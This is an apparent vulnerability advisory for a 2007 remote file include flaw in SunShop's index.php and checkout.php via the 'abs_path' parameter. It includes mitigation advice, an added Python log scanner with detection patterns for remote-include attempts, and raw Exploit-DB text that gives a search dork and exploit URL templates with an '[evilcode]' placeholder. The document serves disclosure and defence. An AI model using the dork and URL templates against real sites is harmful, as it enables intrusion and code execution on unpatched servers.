Vendor: SunShop
By: irvian
CVSS: 7.5 (HIGH)
CWE: Remote File Include
Product Name: SunShop
Affected Version From: SunShop v3.5
Affected Version To: SunShop v4
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

SunShop 4 (index.php) Remote File Include Vulnerability

The vulnerability allows remote attackers to include arbitrary files via the 'abs_path' parameter in the 'index.php' and 'checkout.php' scripts. This can lead to remote code execution and unauthorized access to sensitive information.

Mitigation:

Apply the latest security patches provided by the vendor. Restrict access to the affected scripts from untrusted sources. Regularly monitor and review server logs for any suspicious activity.
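
The log review recommended above can be narrowed to the two scripts and the parameter this advisory names. The Python sketch below is an added example, not part of the original advisory or the Exploit-DB entry; it assumes combined-format web server access logs, and the sample lines, addresses and host names are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

SCRIPTS = {"index.php", "checkout.php"}   # scripts named in the advisory
PARAM = "abs_path"                        # parameter named in the advisory
# Value begins with a URL scheme / stream wrapper (2+ chars, so not "C:") or a UNC path.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]+:|\\\\)", re.I)
# Client address and request target from a combined-format log line (assumed format).
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" \d{3}')

def fully_decode(value, rounds=3):
    """Normalize repeated percent-encoding so the value is checked in decoded form."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return (client, script, value, verdict) for a flagged line, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    script = next((s for s in unquote(url.path).lower().split("/") if s in SCRIPTS), None)
    values = parse_qs(url.query, keep_blank_values=True).get(PARAM)
    if script is None or not values:
        return None
    value = fully_decode(values[0])
    # Assumption: abs_path is an internal path variable clients have no reason to send,
    # so any use is reported; a scheme or UNC prefix means the include resolves off-host.
    verdict = "remote-include" if REMOTE.match(value) else "param-override"
    return client, script, value, verdict

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (documentation addresses and host names).
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Apr/2007:10:01:02 +0000] "GET /index.php?abs_path=http://files.example/inc.txt HTTP/1.1" 200 512',
    '203.0.113.7 - - [16/Apr/2007:10:01:09 +0000] "GET /shop/checkout.php?abs_path=ftp%3A%2F%2Ffiles.example%2Fa HTTP/1.1" 200 512',
    '198.51.100.4 - - [16/Apr/2007:10:02:00 +0000] "GET /index.php?l=product_detail&p=12 HTTP/1.1" 200 9001',
    '198.51.100.9 - - [16/Apr/2007:10:03:00 +0000] "GET /checkout.php?abs_path=/var/www/shop/ HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit, sep="\t")
```

Parameters sent in a POST body do not appear in access logs, so this covers query-string requests only.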

Exploit-DB raw data:

sunshop 4 (index.php) Remote File Include Vulnerability

-----------------------------------------------------------------------------------------
# scripts       : SunShop v3.5
# Discovered By : irvian
# scripts site  : http://www.turnkeywebtools.com/sunshop/
# Thanks To     : #hitamputih #nyubicrew #patihack
# special To    : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz,permenhack
# dork          : "powered by sunshop"
------------------------------------------------------------------------------------------
bug found:

Exploit: www.target.com/index.php?abs_path=[evilcode]
         www.target.com/checkout.php?abs_path=[evilcode]

# milw0rm.com [2007-04-16]